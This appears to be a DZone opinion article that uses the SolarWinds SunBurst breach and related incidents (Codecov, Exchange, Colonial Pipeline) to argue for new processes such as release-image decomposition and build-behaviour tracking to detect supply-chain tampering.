A New Era of Software Processes Is on the Horizon
Learn about security gaps and new analysis processes that are needed in order to help developers and consumers secure what they build and verify what they buy.
Join the DZone community and get the full member experience.Join For Free
The report late last year from FireEye of a state-sponsored attack targeting SolarWinds’ Orion software sent a shockwave through the industry and the reverberations from the discovery are continuing to ripple. As many as 18,000 SolarWinds customers — including at least nine U.S. government agencies — were infected via the SunBurst breach of the network monitoring and management solution. Moreover, according to a recent study from IronNet, the average financial impact of that attack was 11% of annual revenue or about $12 million per company.
U.S. intelligence has put the blame for the attack on Russian-sponsored hackers, who compromised multiple Orion software updates that were released between March and June 2020, giving bad actors a backdoor into exploited systems. Our research found that the Orion software build and code-signing infrastructure was compromised, with the source code of the affected library directly modified to include malicious backdoor code that was compiled, signed, and delivered via the existing patch release management system.
And the attacks have continued in the months following the SolarWinds revelations. In March, it was learned that Microsoft Exchange Server was the victim of a zero-day vulnerability exploited by Chinese nation-state actor HAFNIUM, while a month later it was announced that code coverage and testing company Codecov was targeted in a supply-chain data breach. Codecov hackers had reportedly breached hundreds of customer networks, according to one investigator, after collecting sensitive credentials from its altered Bash Uploader script.
At the same time, critical infrastructure is also being targeted. In two high-profile cases, Russian cybercriminals are accused of ransomware attacks on Colonial Pipeline in May and JBS Foods in June, harming the fuel and meat processing industries, respectively. Also, earlier this year, two Chinese espionage groups and other hackers are suspected of exploiting the Pulse Connect Secure VPN software to steal sensitive information in attacks that have hit the transportation and telecommunications verticals in the United States and Europe.
Supply-chain attacks aren’t new. A 2019 Symantec report found that such assaults had increased 78% the year before. What’s worrying is the level of stealth and sophistication. SunBurst attackers were able to remain undetected for as long as possible by blending in with the affected code base and mimicking developers’ coding style and naming standards. They also didn’t immediately start mining information; rather the malware was left to dwell in the system for as long as two weeks gathering data and credentials before communicating with the attackers.
The attack will likely be used as a blueprint for other attackers. Such remote monitoring and management (RMM) tools like Orion increasingly are becoming targets for attackers. Consider the Codecov supply-chain attack, which has drawn comparisons as well, as attackers targeted a developer automation tool to simultaneously impact thousands of customers. Company executives, security pros, and developers alike on both the production and consumption sides need to ensure they have the tools required to mitigate and prevent these kinds of attacks.
Minding the Gaps
The SolarWinds case highlights the challenge of protecting against attacks via a vulnerable supply chain. Cybercriminals in these cases target a company’s vendor and products, using them as Trojan horses as a way into a target’s systems. In this instance, they used a third party's software to plant a backdoor to gain access.
While traditional security products can discover vulnerabilities, open-source software violations, and coding defects, they aren’t equipped to address malware that may be inadvertently or maliciously built into the code or certificates that are abused to exploit trust.
There are several security gaps in the software supply chain that need to be addressed. For developers and software buyers, that means understanding key issues such as:
- Security code scans: Application security testing (AST) technologies like Static and Dynamic AST designed to identify potential security vulnerabilities and architectural weaknesses don’t address malware that’s unknowingly embedded in published software.
- Binary scans: Antivirus and sandbox tools used to safely execute suspicious code without risking harm to the host device or network don’t deal with software packages and installers, which involve large and complex files.
- Certificates and code signatures: Security vendors usually assume a chain of trust is in place, which means if the code is properly signed, they don’t inspect it. In the SolarWinds case, attackers took advantage of the assumption of trust, placing the malware into the development process and codebase.
- Software safety at points in time: Software might be approved, free of threats, and verified gold at one point in time, but later found to have malware after it’s been published.
- Compliance questions: Software that complies with security policies still can be exploited by advanced attackers, so simply asking about compliance isn’t enough.
New Processes Are Needed
Many of the best cyber security minds are looking at the SolarWinds attack to determine what happened, and more information is sure to make its way to the surface. However, we already know enough to appreciate that there isn’t enough being done yet to protect the supply chain. In particular, consider managed service providers (MSPs) and managed security services providers (MSSPs) in recent years that increasingly have become targets of hackers who see their RMM software as avenues into their customers’ infrastructure. That may begin to change.
The SolarWinds attack brought into sharp focus the realization that we need an additional software analysis process that protects both software developers and users from such supply chain attacks. Advancing that process means we need to take steps to secure what you build and verify what you buy:
- Decompose software images: Release packages that are ready for commercial distribution and that need to be decomposed before the solution is released or used, with a system that is part of the software development and a release cycle that is built to look for software tampering, digital signing, and build-quality issues. This way issues can be found and eliminated before distribution.
- Scan libraries and code: By scanning third-party and open-source libraries, source code, and golden images, and by building for more than known vulnerabilities, developers and consumers can ensure the software’s integrity.
- Track software behaviors: The system also needs to leverage static behavioral indicators that can find behavioral differences between compiled versions of the software. The descriptions can determine the effect the software code actions will have on the machine running the software and such differences can indicate problems or threats.
- Determine software deployment risks: Improved processes should also address a range of risks that come with using the software, including known vulnerabilities, certificate validations, enabled migrations, third-party components, and embedded malware.
- Look for anomalies: Scanning for more than just malware means delivering a unified view into software packages, digital signatures, security mitigations, composition, and the like, and should be done throughout the QA and deployment process.
SolarWinds Is Just the Beginning
Groups, including those associated with nation-states, will continue to target the supply chain as they look for more avenues into enterprises’ systems. The European Union Agency for Cybersecurity expects software supply chain attacks to multiply by 4 in 2021 compared to last year, and Gartner predicts that 45 percent of organizations will suffer a supply chain attack by 2025. The recent attacks on Colonial Pipeline, JBS Foods, and Microsoft Exchange Server are only the latest points of proof. The bad actors behind the SunBurst malware demonstrated just one way it can be done and the reach such an attack can have.
Developers and IT staff that deploy software and the business units that use them need to put new processes into place that go beyond the traditional security solutions that we now know fall short against these kinds of third-party attacks. Scanning for known threats and vulnerabilities isn’t enough. The integrity of the software needs to be ensured through the development lifecycle. Otherwise, the door will stay wide open for these kinds of attacks.
Opinions expressed by DZone contributors are their own.